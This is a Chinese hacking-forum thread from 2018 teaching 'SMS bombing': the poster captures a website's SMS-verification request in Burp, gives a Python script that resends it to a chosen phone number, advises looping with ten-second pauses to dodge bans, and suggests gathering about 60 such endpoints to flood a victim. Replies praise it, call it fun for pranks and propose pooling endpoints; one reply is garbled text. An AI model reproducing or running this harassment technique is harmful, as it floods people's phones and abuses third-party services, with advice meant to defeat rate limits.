用户
搜索
  • TA的每日心情
    慵懒
    2019-1-9 23:15
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    安全团队

    突破防线社区

    Rank: 7Rank: 7Rank: 7

    8

    主题

    43

    帖子

    147

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2017-12-31

    i春秋认证i春秋签约作者

    发表于 2018-1-30 16:51:14 3823701

    大家好,我是1ee(因为在作家群,就不加Hacker这个前缀了,怕被大佬打。。)
    刚加入i春秋作家组希望大家多多关照,也欢迎大家找我交流

    今天我来讲讲我最近找到的一个小思路,利用python进行短信轰炸
    首先
    这是一个网站,他的业务存在短信发送
    QQ截图20180130162121.png
    这个时候,我们打开神器burp或者其他抓包工具(最好用burp,因为repeater模块可以满足我们的需要)
    这时候我给我的火狐挂上代理,然后burp开启拦截
    QQ截图20180130162826.png
    抓到了一个包,发送到repeater
    QQ截图20180130162943.png
    进入repeater分析数据包
    QQ截图20180130163114.png
    [AppleScript] 纯文本查看 复制代码
    {"mobile":"13xxxxxx","type":"signup"}

    这个是发送的数据,go走起
    看返回的包可以看到是成功的
    QQ截图20180130163450.png

    然后开始写我们的python进行循环发包对目标进行轰炸

    QQ截图20180130163946.png

    [Python] 纯文本查看 复制代码
    import requests
    import json
    headers = {'User-Agent'  : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.de*****n.com/'}
    #data =
    #print data
    r = requests.post('/capi/v1/dm**me/send_token',data=json.dumps({"mobile":"手机号码","type":"signup"}),headers=headers)
    
    
    print(r.text)

    先进行测试,测试完成后可以for循环加强脚本的威力,经过我的研究发现当一个号码多次提交后会被ban,如我一次性发了10个包后(也就是发了十条短信)之后的这个号码就不会再发了,即使返回的包状态是成功,但是短信是发不到的,其实我们可以停顿十秒再发下一个,这样就不会被ban,这也是测试知道的



    好了,今天我就说道这吧,可能大家会说就一个号码我直接加入黑名单就ok了,的确,但是我们可以挖掘这类型的网站,然后一个一个接口发送一次,60个接口,一秒钟就60条短信,威力还是可以的,附上成功的图片

    QQ截图20180130164813.png QQ截图20180130164840.png QQ图片20180130152427.jpg





    加入突破防线社区,群:415462823
    本帖最后由 icq8285ce7f 于 2018-4-11 19:39 编辑

    请问您的   r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"18207419536","type":"signup"}),headers=headers)
    这个Post里面的/capi/v1/dmhome/send_token是什么路径?能麻烦您解释下么
    使用道具 举报 回复
    发表于 2018-6-1 18:04:38
    icq8285ce7f 发表于 2018-4-11 04:31
    请问您的   r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"18207419536","t ...

    网站的短信接口路径
    加入突破防线社区,群:415462823
    使用道具 举报 回复
    以前是知道思路,不会实现,现在是会实现,然而这种不要验证码或没有SMS block接口已经不像以前那么好找了。
    而且不同的接口需要传入的参数和字段也不同,虽然也写不了多少,偶尔恶作剧下还是不错的。
    使用道具 举报 回复
    <details>sqlmap输出as情,有三个子节点分别a>、<dbms_versdsasion>、<dbms_vedasrsion>。最后一个是<os>sadasdas
    使用道具 举报 回复
    发表于 2018-1-31 11:48:06
    naozibuhao 发表于 2018-1-31 10:56
    把这个号码屏蔽了就没用了

    嗯,是的,所以要收集,这样就可以实现多个号码轰炸
    加入突破防线社区,群:415462823
    使用道具 举报 回复
    发表于 2018-4-13 14:45:58
    最近就正在弄这个,但是自己一个个找合适的网站或者APP太麻烦了,有想法的朋友们可以把收集到的集合一下
    使用道具 举报 回复
    发表于 2018-1-30 18:44:10

    一看就知道是昨天要收我superme的大佬
    加入突破防线社区,群:415462823
    使用道具 举报 回复
    发表于 2018-1-31 16:03:32
    这就是以前的短信轰炸的思路,对于这类型网站,可以提交漏洞存在短信轰炸
    专注网络安全与程序开发,博客:https://blog.dyboy.cn
    使用道具 举报 回复
    发表于 2018-1-30 17:27:48
    写个脚本帮你点击go~~  哈哈
    小白~~~
    使用道具 举报 回复
    厉害,支持一下
    使用道具 举报 回复
    发表于 2018-1-30 17:32:14
    黑客黑客
    一位特爱收藏Supreme的大哥哥....
    使用道具 举报 回复
    发表于 2018-1-30 17:33:48
    有的接口是不同号码发的
    使用道具 举报 回复
    发表于 2018-1-30 18:43:22
    __LSA__ 发表于 2018-1-30 17:33
    有的接口是不同号码发的

    是啊是啊
    加入突破防线社区,群:415462823
    使用道具 举报 回复
    发表于 2018-1-30 18:45:15
    李哥六六六
    Zer0 Sec(零安全团队)
    使用道具 举报 回复
    这个很黑客!!!
    使用道具 举报 回复
    本帖最后由 LinkeyShell 于 2018-4-2 17:28 编辑

    可以啊。很厉害
    使用道具 举报 回复
    发表于 2018-1-30 21:56:58
    阔以的,自己也想写一个轰炸机来着,懒得去收集接口,就……
    求知若饥,虚心若愚。
    使用道具 举报 回复
    本帖最后由 LinkeyShell 于 2018-1-30 22:48 编辑

    厉害了,可以

    使用道具 举报 回复
    发表于 2018-1-31 09:12:38
    思路可以啊
    使用道具 举报 回复
    发表于 2018-1-31 09:23:39
    好东西,谢谢楼主分享,66666。
    使用道具 举报 回复
    发表于 2018-1-31 10:16:43
    python还可以这样玩。厉害了。
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册